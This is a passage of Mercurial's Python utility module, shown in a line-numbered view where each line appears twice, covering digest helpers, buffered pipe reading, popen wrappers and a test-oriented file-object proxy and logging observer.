241 # The option of setting PYTHONWARNINGS in the test runner was investigated.
242 # However, module name set through PYTHONWARNINGS was exactly matched, so
242 # However, module name set through PYTHONWARNINGS was exactly matched, so
243 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
243 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
244 # makes the whole PYTHONWARNINGS thing useless for our usecase.
244 # makes the whole PYTHONWARNINGS thing useless for our usecase.
245 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
245 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
246 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
247 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
248 if _dowarn and pycompat.ispy3:
248 if _dowarn and pycompat.ispy3:
249 # silence warning emitted by passing user string to re.sub()
249 # silence warning emitted by passing user string to re.sub()
250 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
250 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
251 r'mercurial')
251 r'mercurial')
252 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
252 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
253 DeprecationWarning, r'mercurial')
253 DeprecationWarning, r'mercurial')
254
254
255 def nouideprecwarn(msg, version, stacklevel=1):
255 def nouideprecwarn(msg, version, stacklevel=1):
256 """Issue an python native deprecation warning
256 """Issue an python native deprecation warning
257
257
258 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
258 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
259 """
259 """
260 if _dowarn:
260 if _dowarn:
261 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
261 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
262 " update your code.)") % version
262 " update your code.)") % version
263 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
263 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
264
264
265 DIGESTS = {
265 DIGESTS = {
266 'md5': hashlib.md5,
266 'md5': hashlib.md5,
267 'sha1': hashlib.sha1,
267 'sha1': hashlib.sha1,
268 'sha512': hashlib.sha512,
268 'sha512': hashlib.sha512,
269 }
269 }
270 # List of digest types from strongest to weakest
270 # List of digest types from strongest to weakest
271 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
271 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
272
272
273 for k in DIGESTS_BY_STRENGTH:
273 for k in DIGESTS_BY_STRENGTH:
274 assert k in DIGESTS
274 assert k in DIGESTS
275
275
276 class digester(object):
276 class digester(object):
277 """helper to compute digests.
277 """helper to compute digests.
278
278
279 This helper can be used to compute one or more digests given their name.
279 This helper can be used to compute one or more digests given their name.
280
280
281 >>> d = digester([b'md5', b'sha1'])
281 >>> d = digester([b'md5', b'sha1'])
282 >>> d.update(b'foo')
282 >>> d.update(b'foo')
283 >>> [k for k in sorted(d)]
283 >>> [k for k in sorted(d)]
284 ['md5', 'sha1']
284 ['md5', 'sha1']
285 >>> d[b'md5']
285 >>> d[b'md5']
286 'acbd18db4cc2f85cedef654fccc4a4d8'
286 'acbd18db4cc2f85cedef654fccc4a4d8'
287 >>> d[b'sha1']
287 >>> d[b'sha1']
288 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
288 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
289 >>> digester.preferred([b'md5', b'sha1'])
289 >>> digester.preferred([b'md5', b'sha1'])
290 'sha1'
290 'sha1'
291 """
291 """
292
292
293 def __init__(self, digests, s=''):
293 def __init__(self, digests, s=''):
294 self._hashes = {}
294 self._hashes = {}
295 for k in digests:
295 for k in digests:
296 if k not in DIGESTS:
296 if k not in DIGESTS:
297 raise Abort(_('unknown digest type: %s') % k)
297 raise Abort(_('unknown digest type: %s') % k)
298 self._hashes[k] = DIGESTS[k]()
298 self._hashes[k] = DIGESTS[k]()
299 if s:
299 if s:
300 self.update(s)
300 self.update(s)
301
301
302 def update(self, data):
302 def update(self, data):
303 for h in self._hashes.values():
303 for h in self._hashes.values():
304 h.update(data)
304 h.update(data)
305
305
306 def __getitem__(self, key):
306 def __getitem__(self, key):
307 if key not in DIGESTS:
307 if key not in DIGESTS:
308 raise Abort(_('unknown digest type: %s') % k)
308 raise Abort(_('unknown digest type: %s') % k)
309 return nodemod.hex(self._hashes[key].digest())
309 return nodemod.hex(self._hashes[key].digest())
310
310
311 def __iter__(self):
311 def __iter__(self):
312 return iter(self._hashes)
312 return iter(self._hashes)
313
313
314 @staticmethod
314 @staticmethod
315 def preferred(supported):
315 def preferred(supported):
316 """returns the strongest digest type in both supported and DIGESTS."""
316 """returns the strongest digest type in both supported and DIGESTS."""
317
317
318 for k in DIGESTS_BY_STRENGTH:
318 for k in DIGESTS_BY_STRENGTH:
319 if k in supported:
319 if k in supported:
320 return k
320 return k
321 return None
321 return None
322
322
323 class digestchecker(object):
323 class digestchecker(object):
324 """file handle wrapper that additionally checks content against a given
324 """file handle wrapper that additionally checks content against a given
325 size and digests.
325 size and digests.
326
326
327 d = digestchecker(fh, size, {'md5': '...'})
327 d = digestchecker(fh, size, {'md5': '...'})
328
328
329 When multiple digests are given, all of them are validated.
329 When multiple digests are given, all of them are validated.
330 """
330 """
331
331
332 def __init__(self, fh, size, digests):
332 def __init__(self, fh, size, digests):
333 self._fh = fh
333 self._fh = fh
334 self._size = size
334 self._size = size
335 self._got = 0
335 self._got = 0
336 self._digests = dict(digests)
336 self._digests = dict(digests)
337 self._digester = digester(self._digests.keys())
337 self._digester = digester(self._digests.keys())
338
338
339 def read(self, length=-1):
339 def read(self, length=-1):
340 content = self._fh.read(length)
340 content = self._fh.read(length)
341 self._digester.update(content)
341 self._digester.update(content)
342 self._got += len(content)
342 self._got += len(content)
343 return content
343 return content
344
344
345 def validate(self):
345 def validate(self):
346 if self._size != self._got:
346 if self._size != self._got:
347 raise Abort(_('size mismatch: expected %d, got %d') %
347 raise Abort(_('size mismatch: expected %d, got %d') %
348 (self._size, self._got))
348 (self._size, self._got))
349 for k, v in self._digests.items():
349 for k, v in self._digests.items():
350 if v != self._digester[k]:
350 if v != self._digester[k]:
351 # i18n: first parameter is a digest name
351 # i18n: first parameter is a digest name
352 raise Abort(_('%s mismatch: expected %s, got %s') %
352 raise Abort(_('%s mismatch: expected %s, got %s') %
353 (k, v, self._digester[k]))
353 (k, v, self._digester[k]))
354
354
355 try:
355 try:
356 buffer = buffer
356 buffer = buffer
357 except NameError:
357 except NameError:
358 def buffer(sliceable, offset=0, length=None):
358 def buffer(sliceable, offset=0, length=None):
359 if length is not None:
359 if length is not None:
360 return memoryview(sliceable)[offset:offset + length]
360 return memoryview(sliceable)[offset:offset + length]
361 return memoryview(sliceable)[offset:]
361 return memoryview(sliceable)[offset:]
362
362
363 closefds = pycompat.isposix
363 closefds = pycompat.isposix
364
364
365 _chunksize = 4096
365 _chunksize = 4096
366
366
367 class bufferedinputpipe(object):
367 class bufferedinputpipe(object):
368 """a manually buffered input pipe
368 """a manually buffered input pipe
369
369
370 Python will not let us use buffered IO and lazy reading with 'polling' at
370 Python will not let us use buffered IO and lazy reading with 'polling' at
371 the same time. We cannot probe the buffer state and select will not detect
371 the same time. We cannot probe the buffer state and select will not detect
372 that data are ready to read if they are already buffered.
372 that data are ready to read if they are already buffered.
373
373
374 This class let us work around that by implementing its own buffering
374 This class let us work around that by implementing its own buffering
375 (allowing efficient readline) while offering a way to know if the buffer is
375 (allowing efficient readline) while offering a way to know if the buffer is
376 empty from the output (allowing collaboration of the buffer with polling).
376 empty from the output (allowing collaboration of the buffer with polling).
377
377
378 This class lives in the 'util' module because it makes use of the 'os'
378 This class lives in the 'util' module because it makes use of the 'os'
379 module from the python stdlib.
379 module from the python stdlib.
380 """
380 """
381 def __new__(cls, fh):
381 def __new__(cls, fh):
382 # If we receive a fileobjectproxy, we need to use a variation of this
382 # If we receive a fileobjectproxy, we need to use a variation of this
383 # class that notifies observers about activity.
383 # class that notifies observers about activity.
384 if isinstance(fh, fileobjectproxy):
384 if isinstance(fh, fileobjectproxy):
385 cls = observedbufferedinputpipe
385 cls = observedbufferedinputpipe
386
386
387 return super(bufferedinputpipe, cls).__new__(cls)
387 return super(bufferedinputpipe, cls).__new__(cls)
388
388
389 def __init__(self, input):
389 def __init__(self, input):
390 self._input = input
390 self._input = input
391 self._buffer = []
391 self._buffer = []
392 self._eof = False
392 self._eof = False
393 self._lenbuf = 0
393 self._lenbuf = 0
394
394
395 @property
395 @property
396 def hasbuffer(self):
396 def hasbuffer(self):
397 """True is any data is currently buffered
397 """True is any data is currently buffered
398
398
399 This will be used externally a pre-step for polling IO. If there is
399 This will be used externally a pre-step for polling IO. If there is
400 already data then no polling should be set in place."""
400 already data then no polling should be set in place."""
401 return bool(self._buffer)
401 return bool(self._buffer)
402
402
403 @property
403 @property
404 def closed(self):
404 def closed(self):
405 return self._input.closed
405 return self._input.closed
406
406
407 def fileno(self):
407 def fileno(self):
408 return self._input.fileno()
408 return self._input.fileno()
409
409
410 def close(self):
410 def close(self):
411 return self._input.close()
411 return self._input.close()
412
412
413 def read(self, size):
413 def read(self, size):
414 while (not self._eof) and (self._lenbuf < size):
414 while (not self._eof) and (self._lenbuf < size):
415 self._fillbuffer()
415 self._fillbuffer()
416 return self._frombuffer(size)
416 return self._frombuffer(size)
417
417
418 def readline(self, *args, **kwargs):
418 def readline(self, *args, **kwargs):
419 if 1 < len(self._buffer):
419 if 1 < len(self._buffer):
420 # this should not happen because both read and readline end with a
420 # this should not happen because both read and readline end with a
421 # _frombuffer call that collapse it.
421 # _frombuffer call that collapse it.
422 self._buffer = [''.join(self._buffer)]
422 self._buffer = [''.join(self._buffer)]
423 self._lenbuf = len(self._buffer[0])
423 self._lenbuf = len(self._buffer[0])
424 lfi = -1
424 lfi = -1
425 if self._buffer:
425 if self._buffer:
426 lfi = self._buffer[-1].find('\n')
426 lfi = self._buffer[-1].find('\n')
427 while (not self._eof) and lfi < 0:
427 while (not self._eof) and lfi < 0:
428 self._fillbuffer()
428 self._fillbuffer()
429 if self._buffer:
429 if self._buffer:
430 lfi = self._buffer[-1].find('\n')
430 lfi = self._buffer[-1].find('\n')
431 size = lfi + 1
431 size = lfi + 1
432 if lfi < 0: # end of file
432 if lfi < 0: # end of file
433 size = self._lenbuf
433 size = self._lenbuf
434 elif 1 < len(self._buffer):
434 elif 1 < len(self._buffer):
435 # we need to take previous chunks into account
435 # we need to take previous chunks into account
436 size += self._lenbuf - len(self._buffer[-1])
436 size += self._lenbuf - len(self._buffer[-1])
437 return self._frombuffer(size)
437 return self._frombuffer(size)
438
438
439 def _frombuffer(self, size):
439 def _frombuffer(self, size):
440 """return at most 'size' data from the buffer
440 """return at most 'size' data from the buffer
441
441
442 The data are removed from the buffer."""
442 The data are removed from the buffer."""
443 if size == 0 or not self._buffer:
443 if size == 0 or not self._buffer:
444 return ''
444 return ''
445 buf = self._buffer[0]
445 buf = self._buffer[0]
446 if 1 < len(self._buffer):
446 if 1 < len(self._buffer):
447 buf = ''.join(self._buffer)
447 buf = ''.join(self._buffer)
448
448
449 data = buf[:size]
449 data = buf[:size]
450 buf = buf[len(data):]
450 buf = buf[len(data):]
451 if buf:
451 if buf:
452 self._buffer = [buf]
452 self._buffer = [buf]
453 self._lenbuf = len(buf)
453 self._lenbuf = len(buf)
454 else:
454 else:
455 self._buffer = []
455 self._buffer = []
456 self._lenbuf = 0
456 self._lenbuf = 0
457 return data
457 return data
458
458
459 def _fillbuffer(self):
459 def _fillbuffer(self):
460 """read data to the buffer"""
460 """read data to the buffer"""
461 data = os.read(self._input.fileno(), _chunksize)
461 data = os.read(self._input.fileno(), _chunksize)
462 if not data:
462 if not data:
463 self._eof = True
463 self._eof = True
464 else:
464 else:
465 self._lenbuf += len(data)
465 self._lenbuf += len(data)
466 self._buffer.append(data)
466 self._buffer.append(data)
467
467
468 return data
468 return data
469
469
470 def mmapread(fp):
470 def mmapread(fp):
471 try:
471 try:
472 fd = getattr(fp, 'fileno', lambda: fp)()
472 fd = getattr(fp, 'fileno', lambda: fp)()
473 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
473 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
474 except ValueError:
474 except ValueError:
475 # Empty files cannot be mmapped, but mmapread should still work. Check
475 # Empty files cannot be mmapped, but mmapread should still work. Check
476 # if the file is empty, and if so, return an empty buffer.
476 # if the file is empty, and if so, return an empty buffer.
477 if os.fstat(fd).st_size == 0:
477 if os.fstat(fd).st_size == 0:
478 return ''
478 return ''
479 raise
479 raise
480
480
481 def popen2(cmd, env=None, newlines=False):
481 def popen2(cmd, env=None, newlines=False):
482 # Setting bufsize to -1 lets the system decide the buffer size.
482 # Setting bufsize to -1 lets the system decide the buffer size.
483 # The default for bufsize is 0, meaning unbuffered. This leads to
483 # The default for bufsize is 0, meaning unbuffered. This leads to
484 # poor performance on Mac OS X: http://bugs.python.org/issue4194
484 # poor performance on Mac OS X: http://bugs.python.org/issue4194
485 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
485 p = subprocess.Popen(cmd, shell=True, bufsize=-1,
486 close_fds=closefds,
486 close_fds=closefds,
487 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
487 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
488 universal_newlines=newlines,
488 universal_newlines=newlines,
489 env=env)
489 env=env)
490 return p.stdin, p.stdout
490 return p.stdin, p.stdout
491
491
492 def popen3(cmd, env=None, newlines=False):
492 def popen3(cmd, env=None, newlines=False):
493 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
493 stdin, stdout, stderr, p = popen4(cmd, env, newlines)
494 return stdin, stdout, stderr
494 return stdin, stdout, stderr
495
495
496 def popen4(cmd, env=None, newlines=False, bufsize=-1):
496 def popen4(cmd, env=None, newlines=False, bufsize=-1):
497 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
497 p = subprocess.Popen(cmd, shell=True, bufsize=bufsize,
498 close_fds=closefds,
498 close_fds=closefds,
499 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
499 stdin=subprocess.PIPE, stdout=subprocess.PIPE,
500 stderr=subprocess.PIPE,
500 stderr=subprocess.PIPE,
501 universal_newlines=newlines,
501 universal_newlines=newlines,
502 env=env)
502 env=env)
503 return p.stdin, p.stdout, p.stderr, p
503 return p.stdin, p.stdout, p.stderr, p
504
504
505 class fileobjectproxy(object):
505 class fileobjectproxy(object):
506 """A proxy around file objects that tells a watcher when events occur.
506 """A proxy around file objects that tells a watcher when events occur.
507
507
508 This type is intended to only be used for testing purposes. Think hard
508 This type is intended to only be used for testing purposes. Think hard
509 before using it in important code.
509 before using it in important code.
510 """
510 """
511 __slots__ = (
511 __slots__ = (
512 r'_orig',
512 r'_orig',
513 r'_observer',
513 r'_observer',
514 )
514 )
515
515
516 def __init__(self, fh, observer):
516 def __init__(self, fh, observer):
517 object.__setattr__(self, r'_orig', fh)
517 object.__setattr__(self, r'_orig', fh)
518 object.__setattr__(self, r'_observer', observer)
518 object.__setattr__(self, r'_observer', observer)
519
519
520 def __getattribute__(self, name):
520 def __getattribute__(self, name):
521 ours = {
521 ours = {
522 r'_observer',
522 r'_observer',
523
523
524 # IOBase
524 # IOBase
525 r'close',
525 r'close',
526 # closed if a property
526 # closed if a property
527 r'fileno',
527 r'fileno',
528 r'flush',
528 r'flush',
529 r'isatty',
529 r'isatty',
530 r'readable',
530 r'readable',
531 r'readline',
531 r'readline',
532 r'readlines',
532 r'readlines',
533 r'seek',
533 r'seek',
534 r'seekable',
534 r'seekable',
535 r'tell',
535 r'tell',
536 r'truncate',
536 r'truncate',
537 r'writable',
537 r'writable',
538 r'writelines',
538 r'writelines',
539 # RawIOBase
539 # RawIOBase
540 r'read',
540 r'read',
541 r'readall',
541 r'readall',
542 r'readinto',
542 r'readinto',
543 r'write',
543 r'write',
544 # BufferedIOBase
544 # BufferedIOBase
545 # raw is a property
545 # raw is a property
546 r'detach',
546 r'detach',
547 # read defined above
547 # read defined above
548 r'read1',
548 r'read1',
549 # readinto defined above
549 # readinto defined above
550 # write defined above
550 # write defined above
551 }
551 }
552
552
553 # We only observe some methods.
553 # We only observe some methods.
554 if name in ours:
554 if name in ours:
555 return object.__getattribute__(self, name)
555 return object.__getattribute__(self, name)
556
556
557 return getattr(object.__getattribute__(self, r'_orig'), name)
557 return getattr(object.__getattribute__(self, r'_orig'), name)
558
558
559 def __delattr__(self, name):
559 def __delattr__(self, name):
560 return delattr(object.__getattribute__(self, r'_orig'), name)
560 return delattr(object.__getattribute__(self, r'_orig'), name)
561
561
562 def __setattr__(self, name, value):
562 def __setattr__(self, name, value):
563 return setattr(object.__getattribute__(self, r'_orig'), name, value)
563 return setattr(object.__getattribute__(self, r'_orig'), name, value)
564
564
565 def __iter__(self):
565 def __iter__(self):
566 return object.__getattribute__(self, r'_orig').__iter__()
566 return object.__getattribute__(self, r'_orig').__iter__()
567
567
568 def _observedcall(self, name, *args, **kwargs):
568 def _observedcall(self, name, *args, **kwargs):
569 # Call the original object.
569 # Call the original object.
570 orig = object.__getattribute__(self, r'_orig')
570 orig = object.__getattribute__(self, r'_orig')
571 res = getattr(orig, name)(*args, **kwargs)
571 res = getattr(orig, name)(*args, **kwargs)
572
572
573 # Call a method on the observer of the same name with arguments
573 # Call a method on the observer of the same name with arguments
574 # so it can react, log, etc.
574 # so it can react, log, etc.
575 observer = object.__getattribute__(self, r'_observer')
575 observer = object.__getattribute__(self, r'_observer')
576 fn = getattr(observer, name, None)
576 fn = getattr(observer, name, None)
577 if fn:
577 if fn:
578 fn(res, *args, **kwargs)
578 fn(res, *args, **kwargs)
579
579
580 return res
580 return res
581
581
582 def close(self, *args, **kwargs):
582 def close(self, *args, **kwargs):
583 return object.__getattribute__(self, r'_observedcall')(
583 return object.__getattribute__(self, r'_observedcall')(
584 r'close', *args, **kwargs)
584 r'close', *args, **kwargs)
585
585
586 def fileno(self, *args, **kwargs):
586 def fileno(self, *args, **kwargs):
587 return object.__getattribute__(self, r'_observedcall')(
587 return object.__getattribute__(self, r'_observedcall')(
588 r'fileno', *args, **kwargs)
588 r'fileno', *args, **kwargs)
589
589
590 def flush(self, *args, **kwargs):
590 def flush(self, *args, **kwargs):
591 return object.__getattribute__(self, r'_observedcall')(
591 return object.__getattribute__(self, r'_observedcall')(
592 r'flush', *args, **kwargs)
592 r'flush', *args, **kwargs)
593
593
594 def isatty(self, *args, **kwargs):
594 def isatty(self, *args, **kwargs):
595 return object.__getattribute__(self, r'_observedcall')(
595 return object.__getattribute__(self, r'_observedcall')(
596 r'isatty', *args, **kwargs)
596 r'isatty', *args, **kwargs)
597
597
598 def readable(self, *args, **kwargs):
598 def readable(self, *args, **kwargs):
599 return object.__getattribute__(self, r'_observedcall')(
599 return object.__getattribute__(self, r'_observedcall')(
600 r'readable', *args, **kwargs)
600 r'readable', *args, **kwargs)
601
601
602 def readline(self, *args, **kwargs):
602 def readline(self, *args, **kwargs):
603 return object.__getattribute__(self, r'_observedcall')(
603 return object.__getattribute__(self, r'_observedcall')(
604 r'readline', *args, **kwargs)
604 r'readline', *args, **kwargs)
605
605
606 def readlines(self, *args, **kwargs):
606 def readlines(self, *args, **kwargs):
607 return object.__getattribute__(self, r'_observedcall')(
607 return object.__getattribute__(self, r'_observedcall')(
608 r'readlines', *args, **kwargs)
608 r'readlines', *args, **kwargs)
609
609
610 def seek(self, *args, **kwargs):
610 def seek(self, *args, **kwargs):
611 return object.__getattribute__(self, r'_observedcall')(
611 return object.__getattribute__(self, r'_observedcall')(
612 r'seek', *args, **kwargs)
612 r'seek', *args, **kwargs)
613
613
614 def seekable(self, *args, **kwargs):
614 def seekable(self, *args, **kwargs):
615 return object.__getattribute__(self, r'_observedcall')(
615 return object.__getattribute__(self, r'_observedcall')(
616 r'seekable', *args, **kwargs)
616 r'seekable', *args, **kwargs)
617
617
618 def tell(self, *args, **kwargs):
618 def tell(self, *args, **kwargs):
619 return object.__getattribute__(self, r'_observedcall')(
619 return object.__getattribute__(self, r'_observedcall')(
620 r'tell', *args, **kwargs)
620 r'tell', *args, **kwargs)
621
621
622 def truncate(self, *args, **kwargs):
622 def truncate(self, *args, **kwargs):
623 return object.__getattribute__(self, r'_observedcall')(
623 return object.__getattribute__(self, r'_observedcall')(
624 r'truncate', *args, **kwargs)
624 r'truncate', *args, **kwargs)
625
625
626 def writable(self, *args, **kwargs):
626 def writable(self, *args, **kwargs):
627 return object.__getattribute__(self, r'_observedcall')(
627 return object.__getattribute__(self, r'_observedcall')(
628 r'writable', *args, **kwargs)
628 r'writable', *args, **kwargs)
629
629
630 def writelines(self, *args, **kwargs):
630 def writelines(self, *args, **kwargs):
631 return object.__getattribute__(self, r'_observedcall')(
631 return object.__getattribute__(self, r'_observedcall')(
632 r'writelines', *args, **kwargs)
632 r'writelines', *args, **kwargs)
633
633
634 def read(self, *args, **kwargs):
634 def read(self, *args, **kwargs):
635 return object.__getattribute__(self, r'_observedcall')(
635 return object.__getattribute__(self, r'_observedcall')(
636 r'read', *args, **kwargs)
636 r'read', *args, **kwargs)
637
637
638 def readall(self, *args, **kwargs):
638 def readall(self, *args, **kwargs):
639 return object.__getattribute__(self, r'_observedcall')(
639 return object.__getattribute__(self, r'_observedcall')(
640 r'readall', *args, **kwargs)
640 r'readall', *args, **kwargs)
641
641
642 def readinto(self, *args, **kwargs):
642 def readinto(self, *args, **kwargs):
643 return object.__getattribute__(self, r'_observedcall')(
643 return object.__getattribute__(self, r'_observedcall')(
644 r'readinto', *args, **kwargs)
644 r'readinto', *args, **kwargs)
645
645
646 def write(self, *args, **kwargs):
646 def write(self, *args, **kwargs):
647 return object.__getattribute__(self, r'_observedcall')(
647 return object.__getattribute__(self, r'_observedcall')(
648 r'write', *args, **kwargs)
648 r'write', *args, **kwargs)
649
649
650 def detach(self, *args, **kwargs):
650 def detach(self, *args, **kwargs):
651 return object.__getattribute__(self, r'_observedcall')(
651 return object.__getattribute__(self, r'_observedcall')(
652 r'detach', *args, **kwargs)
652 r'detach', *args, **kwargs)
653
653
654 def read1(self, *args, **kwargs):
654 def read1(self, *args, **kwargs):
655 return object.__getattribute__(self, r'_observedcall')(
655 return object.__getattribute__(self, r'_observedcall')(
656 r'read1', *args, **kwargs)
656 r'read1', *args, **kwargs)
657
657
658 class observedbufferedinputpipe(bufferedinputpipe):
658 class observedbufferedinputpipe(bufferedinputpipe):
659 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
659 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
660
660
661 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
661 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
662 bypass ``fileobjectproxy``. Because of this, we need to make
662 bypass ``fileobjectproxy``. Because of this, we need to make
663 ``bufferedinputpipe`` aware of these operations.
663 ``bufferedinputpipe`` aware of these operations.
664
664
665 This variation of ``bufferedinputpipe`` can notify observers about
665 This variation of ``bufferedinputpipe`` can notify observers about
666 ``os.read()`` events. It also re-publishes other events, such as
666 ``os.read()`` events. It also re-publishes other events, such as
667 ``read()`` and ``readline()``.
667 ``read()`` and ``readline()``.
668 """
668 """
669 def _fillbuffer(self):
669 def _fillbuffer(self):
670 res = super(observedbufferedinputpipe, self)._fillbuffer()
670 res = super(observedbufferedinputpipe, self)._fillbuffer()
671
671
672 fn = getattr(self._input._observer, r'osread', None)
672 fn = getattr(self._input._observer, r'osread', None)
673 if fn:
673 if fn:
674 fn(res, _chunksize)
674 fn(res, _chunksize)
675
675
676 return res
676 return res
677
677
678 # We use different observer methods because the operation isn't
678 # We use different observer methods because the operation isn't
679 # performed on the actual file object but on us.
679 # performed on the actual file object but on us.
680 def read(self, size):
680 def read(self, size):
681 res = super(observedbufferedinputpipe, self).read(size)
681 res = super(observedbufferedinputpipe, self).read(size)
682
682
683 fn = getattr(self._input._observer, r'bufferedread', None)
683 fn = getattr(self._input._observer, r'bufferedread', None)
684 if fn:
684 if fn:
685 fn(res, size)
685 fn(res, size)
686
686
687 return res
687 return res
688
688
689 def readline(self, *args, **kwargs):
689 def readline(self, *args, **kwargs):
690 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
690 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
691
691
692 fn = getattr(self._input._observer, r'bufferedreadline', None)
692 fn = getattr(self._input._observer, r'bufferedreadline', None)
693 if fn:
693 if fn:
694 fn(res)
694 fn(res)
695
695
696 return res
696 return res
697
697
698 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
698 DATA_ESCAPE_MAP = {pycompat.bytechr(i): br'\x%02x' % i for i in range(256)}
699 DATA_ESCAPE_MAP.update({
699 DATA_ESCAPE_MAP.update({
700 b'\\': b'\\\\',
700 b'\\': b'\\\\',
701 b'\r': br'\r',
701 b'\r': br'\r',
702 b'\n': br'\n',
702 b'\n': br'\n',
703 })
703 })
704 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
704 DATA_ESCAPE_RE = remod.compile(br'[\x00-\x08\x0a-\x1f\\\x7f-\xff]')
705
705
706 def escapedata(s):
706 def escapedata(s):
707 if isinstance(s, bytearray):
707 if isinstance(s, bytearray):
708 s = bytes(s)
708 s = bytes(s)
709
709
710 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
710 return DATA_ESCAPE_RE.sub(lambda m: DATA_ESCAPE_MAP[m.group(0)], s)
711
711
712 class fileobjectobserver(object):
712 class fileobjectobserver(object):
713 """Logs file object activity."""
713 """Logs file object activity."""
714 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
714 def __init__(self, fh, name, reads=True, writes=True, logdata=False):
715 self.fh = fh
715 self.fh = fh
716 self.name = name
716 self.name = name
717 self.logdata = logdata
717 self.logdata = logdata
718 self.reads = reads
718 self.reads = reads
719 self.writes = writes
719 self.writes = writes
720
720
721 def _writedata(self, data):
721 def _writedata(self, data):
722 if not self.logdata:
722 if not self.logdata:
723 self.fh.write('\n')
723 self.fh.write('\n')
724 return
724 return
725
725
726 # Simple case writes all data on a single line.
726 # Simple case writes all data on a single line.
727 if b'\n' not in data:
727 if b'\n' not in data:
728 self.fh.write(': %s\n' % escapedata(data))
728 self.fh.write(': %s\n' % escapedata(data))
729 return
729 return
730
730
731 # Data with newlines is written to multiple lines.
731 # Data with newlines is written to multiple lines.
732 self.fh.write(':\n')
732 self.fh.write(':\n')
733 lines = data.splitlines(True)
733 lines = data.splitlines(True)
734 for line in lines:
734 for line in lines:
735 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
735 self.fh.write('%s> %s\n' % (self.name, escapedata(line)))
736
736
737 def read(self, res, size=-1):
737 def read(self, res, size=-1):
738 if not self.reads:
738 if not self.reads:
739 return
739 return
740 # Python 3 can return None from reads at EOF instead of empty strings.
740 # Python 3 can return None from reads at EOF instead of empty strings.
741 if res is None:
741 if res is None:
742 res = ''
742 res = ''
743
743
744 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
744 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
745 self._writedata(res)
745 self._writedata(res)
746
746
747 def readline(self, res, limit=-1):
747 def readline(self, res, limit=-1):
748 if not self.reads:
748 if not self.reads:
749 return
749 return
750
750
751 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
751 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
752 self._writedata(res)
752 self._writedata(res)
753
753
754 def readinto(self, res, dest):
754 def readinto(self, res, dest):
755 if not self.reads:
755 if not self.reads:
756 return
756 return
757
757
758 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
758 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
759 res))
759 res))
760 data = dest[0:res] if res is not None else b''
760 data = dest[0:res] if res is not None else b''
761 self._writedata(data)
761 self._writedata(data)
762
762
763 def write(self, res, data):
763 def write(self, res, data):
764 if not self.writes:
764 if not self.writes:
765 return
765 return
766
766
767 # Python 2 returns None from some write() calls. Python 3 (reasonably)
767 # Python 2 returns None from some write() calls. Python 3 (reasonably)
768 # returns the integer bytes written.
768 # returns the integer bytes written.
769 if res is None and data:
769 if res is None and data:
770 res = len(data)
770 res = len(data)
771
771
772 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
772 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
773 self._writedata(data)
773 self._writedata(data)
774
774
775 def flush(self, res):
775 def flush(self, res):
776 if not self.writes:
776 if not self.writes:
777 return
777 return
778
778
779 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
779 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
780
780
781 # For observedbufferedinputpipe.
781 # For observedbufferedinputpipe.
782 def bufferedread(self, res, size):
782 def bufferedread(self, res, size):
783 self.fh.write('%s> bufferedread(%d) -> %d' % (
783 self.fh.write('%s> bufferedread(%d) -> %d' % (
784 self.name, size, len(res)))
784 self.name, size, len(res)))
785 self._writedata(res)
785 self._writedata(res)
786
786
787 def bufferedreadline(self, res):
787 def bufferedreadline(self, res):
788 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
788 self.fh.write('%s> bufferedreadline() -> %d' % (self.name, len(res)))
789 self._writedata(res)
789 self._writedata(res)
790
790
791 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
791 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
